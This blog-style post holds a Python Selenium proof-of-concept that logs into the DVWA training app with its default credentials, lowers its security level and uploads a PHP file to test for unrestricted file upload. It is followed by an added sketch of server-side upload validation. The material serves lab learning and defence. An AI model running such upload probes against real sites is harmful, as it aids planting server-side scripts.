POC: DVWA's File Upload
Author: Internet
Level: low
I recently looked into Python's selenium, so I figured I'd use it to write a POC.
```python
from selenium.webdriver import Chrome
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.by import By
from selenium.webdriver.support.select import Select

driver = Chrome()

# Log in to DVWA.
driver.get("http://192.168.117.130/DVWA-1.9/login.php")
WebDriverWait(driver, 10).until(lambda d: "Login" in d.title)
driver.find_element(By.XPATH, '//*[@id="content"]/form/fieldset/input[1]').send_keys("admin")
driver.find_element(By.XPATH, '//*[@id="content"]/form/fieldset/input[2]').send_keys("password")
driver.find_element(By.XPATH, '//*[@id="content"]/form/fieldset/p/input').click()

# Open the security settings page and set the level to "low".
driver.find_element(By.XPATH, '//*[@id="main_menu_padded"]/ul[3]/li[1]').click()
driver.find_element(By.XPATH, '//*[@id="main_body"]/div/form/select').click()
loc = (By.XPATH, '//*[@id="main_body"]/div/form/select')
ele = driver.find_element(*loc)
s = Select(ele)
s.select_by_value("low")
driver.find_element(By.XPATH, '//*[@id="main_body"]/div/form/input[1]').click()

# Open the File Upload page and submit the test file.
driver.find_element(By.XPATH, '//*[@id="main_menu_padded"]/ul[2]/li[5]').click()
# Raw string so the backslashes in the Windows path are not treated as escapes.
driver.find_element(By.XPATH, '//*[@id="main_body"]/div/div/form/input[2]').send_keys(r'F:\Python\Project\POC\POC(Proof Of Concept)\one.php')
driver.find_element(By.XPATH, '//*[@id="main_body"]/div/div/form/input[3]').click()

# The upload result message is rendered in a <pre> element.
response = driver.find_element(By.XPATH, '//*[@id="main_body"]/div/div/pre')

# If the result message mentions the uploaded file name, the .php file was accepted.
marker = 'one.php'
flag = marker in str(response.text)

if flag:
    print("It looks likely vulnerable")
else:
    print("It is strong")

# quit() ends the WebDriver session and the driver process, not just the window.
driver.quit()
```
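The PoC only shows that the low level accepts a `.php` file. As an added example (not from the original post and not DVWA's own code), here is a sketch of the server-side checks whose absence it demonstrates. The allowed types, size limit, sample bodies and function names are assumptions chosen for illustration.

```python
import os
import uuid

# Constructed policy values for this example (assumptions, not DVWA settings).
MAX_BYTES = 100_000
MAGIC = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
}


class UploadRejected(ValueError):
    """Raised when an upload fails one of the server-side checks."""


def validate_upload(client_name: str, data: bytes) -> str:
    """Return a server-chosen storage name, or raise UploadRejected."""
    # Use only the final path component; the client controls this string.
    base = os.path.basename(client_name.replace("\\", "/"))
    ext = os.path.splitext(base)[1].lower()
    if ext not in MAGIC:
        raise UploadRejected(f"extension {ext!r} is not allowed")
    if not 0 < len(data) <= MAX_BYTES:
        raise UploadRejected("file is empty or too large")
    # The content must begin with the signature of the claimed type.
    if not data.startswith(MAGIC[ext]):
        raise UploadRejected("content does not match the extension")
    # Never store under the client's name: a random name removes
    # double-extension tricks and predictable paths.
    return uuid.uuid4().hex + ext


def would_accept(client_name: str, data: bytes) -> bool:
    try:
        validate_upload(client_name, data)
        return True
    except UploadRejected:
        return False


# Constructed sample inputs.
PHP_BODY = b"<?php /* constructed sample */ ?>"
PNG_BODY = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32

if __name__ == "__main__":
    for name, body in [("one.php", PHP_BODY), ("one.php.png", PHP_BODY),
                       ("photo.png", PNG_BODY)]:
        print(name, "->", "accepted" if would_accept(name, body) else "rejected")
```

A signature check does not stop a file that is both a valid image and carries script content, so the upload directory should also be served without script execution.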
Source: https://www.cnblogs.com/wavesky/p/16371619.html